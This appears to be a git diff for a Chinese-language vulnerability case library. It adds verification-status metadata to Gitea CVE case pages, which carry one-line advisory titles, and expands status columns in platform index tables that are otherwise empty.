source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-rrcw-5rjv-vj26" # Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68940` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md index bcc58ea9..7e0c75c1 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68941.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:50.339953Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-xfq3-qj7j-4565" # Gitea mishandles access to a private resource upon receiving an API token with scope limited to public resources in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68941` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md index cd37fb89..22fbf0e8 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68942.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:49.781753Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-898p-hh3p-hf9r" # Gitea allows XSS because the search input box (for creating tags and branches) is v-html instead of v-text in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68942` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md index c522bf8b..dc96bc0e 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68943.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:49.213758Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-jhx5-4vr4-f327" # Gitea inadvertently discloses users' login times by allowing (for example) the lastlogintime explore/users sort order in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68943` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68944.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68944.md index d9ff6c0c..78b44811 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68944.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68944.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:50.526913Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-f85h-c7m6-cfpm" # Gitea sometimes mishandles propagation of token scope for access control within one of its own package registries in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68944` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68945.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68945.md index 148bd5a3..96373154 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68945.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68945.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:51.457970Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-7xq4-mwcp-q8fx" # Gitea: anonymous user can visit private user's project in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68945` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md index 4a30eed8..4195e806 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-68946.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:50.473303Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-hq57-c72x-4774" # Gitea vulnerable to Cross-site Scripting in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-68946` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md index c13c9e24..2c1c0483 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2025-69413.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:49.801641Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -33,6 +37,15 @@ primary_source: "https://github.com/advisories/GHSA-pc73-rj2c-wvf9" # Gitea's /api/v1/user endpoint has different responses for failed authentication depending on whether a username exists in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2025-69413` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-0798.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-0798.md index d89cf1d2..2e94c2c7 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-0798.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-0798.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:54.518308Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-8fwc-qjw5-rvgp" # Gitea may send release notification emails for private repositories to users whose access has been revoked in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-0798` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20736.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20736.md index 15f24d7d..6d5897c2 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20736.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20736.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:53.977351Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -35,6 +39,15 @@ primary_source: "https://github.com/advisories/GHSA-hgr3-x44x-33hx" # Gitea has improper access control for uploaded attachments in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20736` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20750.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20750.md index d7b84410..93870bbb 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20750.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20750.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:57.697708Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-rw22-5hhq-pfpf" # Gitea does not properly validate project ownership in organization project operations in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20750` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20800.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20800.md index bcd37e70..0078f4b4 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20800.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20800.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:54.012782Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-2vgv-hgv4-22mh" # Gitea improperly exposes issue and pull request titles in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20800` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20883.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20883.md index 975c5d7d..9577cefd 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20883.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20883.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:54.692700Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-j8xr-c56q-m8jj" # Gitea improperly exposes issue titles and repository names through previously started stopwatches in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20883` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20888.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20888.md index cf04db1a..9e330e36 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20888.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20888.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:56.025932Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-9cgq-wp42-4rpq" # Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20888` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20897.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20897.md index 35a24f53..1e0bdce0 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20897.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20897.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:55.339967Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-393c-qgvj-3xph" # Gitea does not properly validate repository ownership when deleting Git LFS locks in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20897` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20904.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20904.md index 7577b398..92dbfa4d 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20904.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20904.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:54.244003Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-qqgv-v353-cv8p" # Gitea does not properly validate ownership when toggling OpenID URI visibility in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20904` diff --git a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md index 7317070f..00034079 100644 --- a/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md +++ b/07-framework-security/platforms/gitea/cases/gitea-cve-2026-20912.md @@ -8,6 +8,10 @@ updated_date: "2026-03-03T04:57:55.747880Z" severity: "unknown" exploit_status: "unknown" source_confidence: "official" +verification_status: "triage-manual" +verification_mode: "synthetic" +artifact_mode: "synthetic" +last_run_id: "" target_types: - "lab-local" - "lab-public" @@ -34,6 +38,15 @@ primary_source: "https://github.com/advisories/GHSA-4xx9-vc8v-87hv" # Gitea does not properly validate repository ownership when linking attachments to releases in code.gitea.io/gitea +## 本地实证状态 + +- 实证状态: `triage-manual` +- 实证方式: `synthetic` +- Artifact 模式: `synthetic` +- 最近运行: `-` +- 浏览器证据: `missing` +- Run Bundle: `-` + ## 事件层 - Canonical ID: `gitea--CVE-2026-20912` diff --git a/07-framework-security/platforms/gitlab-ce/INDEX.md b/07-framework-security/platforms/gitlab-ce/INDEX.md index 49701e03..c0362ee4 100644 --- a/07-framework-security/platforms/gitlab-ce/INDEX.md +++ b/07-framework-security/platforms/gitlab-ce/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/grafana/INDEX.md b/07-framework-security/platforms/grafana/INDEX.md index 9464976c..f5bd3072 100644 --- a/07-framework-security/platforms/grafana/INDEX.md +++ b/07-framework-security/platforms/grafana/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/jenkins/INDEX.md b/07-framework-security/platforms/jenkins/INDEX.md index 2e1960fe..919d990f 100644 --- a/07-framework-security/platforms/jenkins/INDEX.md +++ b/07-framework-security/platforms/jenkins/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/kibana/INDEX.md b/07-framework-security/platforms/kibana/INDEX.md index e401b5c9..bf1a39a6 100644 --- a/07-framework-security/platforms/kibana/INDEX.md +++ b/07-framework-security/platforms/kibana/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/mattermost/INDEX.md b/07-framework-security/platforms/mattermost/INDEX.md index 3a0d9f30..8666a495 100644 --- a/07-framework-security/platforms/mattermost/INDEX.md +++ b/07-framework-security/platforms/mattermost/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/phpmyadmin/INDEX.md b/07-framework-security/platforms/phpmyadmin/INDEX.md index d80b630c..017b11aa 100644 --- a/07-framework-security/platforms/phpmyadmin/INDEX.md +++ b/07-framework-security/platforms/phpmyadmin/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/platforms/redmine/INDEX.md b/07-framework-security/platforms/redmine/INDEX.md index f50cc40b..09fa78bd 100644 --- a/07-framework-security/platforms/redmine/INDEX.md +++ b/07-framework-security/platforms/redmine/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/servers/apache-httpd/INDEX.md b/07-framework-security/servers/apache-httpd/INDEX.md index 3b08d1a2..a1643b35 100644 --- a/07-framework-security/servers/apache-httpd/INDEX.md +++ b/07-framework-security/servers/apache-httpd/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/servers/apache-tomcat/INDEX.md b/07-framework-security/servers/apache-tomcat/INDEX.md index 1043019b..929834b4 100644 --- a/07-framework-security/servers/apache-tomcat/INDEX.md +++ b/07-framework-security/servers/apache-tomcat/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/servers/caddy/INDEX.md b/07-framework-security/servers/caddy/INDEX.md index bb9eb208..09cc825d 100644 --- a/07-framework-security/servers/caddy/INDEX.md +++ b/07-framework-security/servers/caddy/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/servers/haproxy/INDEX.md b/07-framework-security/servers/haproxy/INDEX.md index b268e31b..fe1f8eca 100644 --- a/07-framework-security/servers/haproxy/INDEX.md +++ b/07-framework-security/servers/haproxy/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -25,6 +29,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 | +|------|--------|----------|----------|----------|------------|----------|--------| +| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - | diff --git a/07-framework-security/servers/nginx/INDEX.md b/07-framework-security/servers/nginx/INDEX.md index 2f536352..36b80185 100644 --- a/07-framework-security/servers/nginx/INDEX.md +++ b/07-framework-security/servers/nginx/INDEX.md @@ -8,7 +8,11 @@ - 总案例数: `0` - 近 30 天新增/更新: `0` - 重点 Markdown 案例数: `0` -- 最近渲染时间: `2026-03-17T04:37:52+00:00` +- 已实证(真实版本): `0` +- 已实证(synthetic): `0` +- 阻塞数: `0` +- 待人工/缺浏览器证据: `0` +- 最近渲染时间: `2026-03-17T06:28:46+00:00` ## 目标约束 @@ -26,6 +30,6 @@ ## 案例列表 -| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 | -|------|--------|------|------------|----------|--------| -| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - | +| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 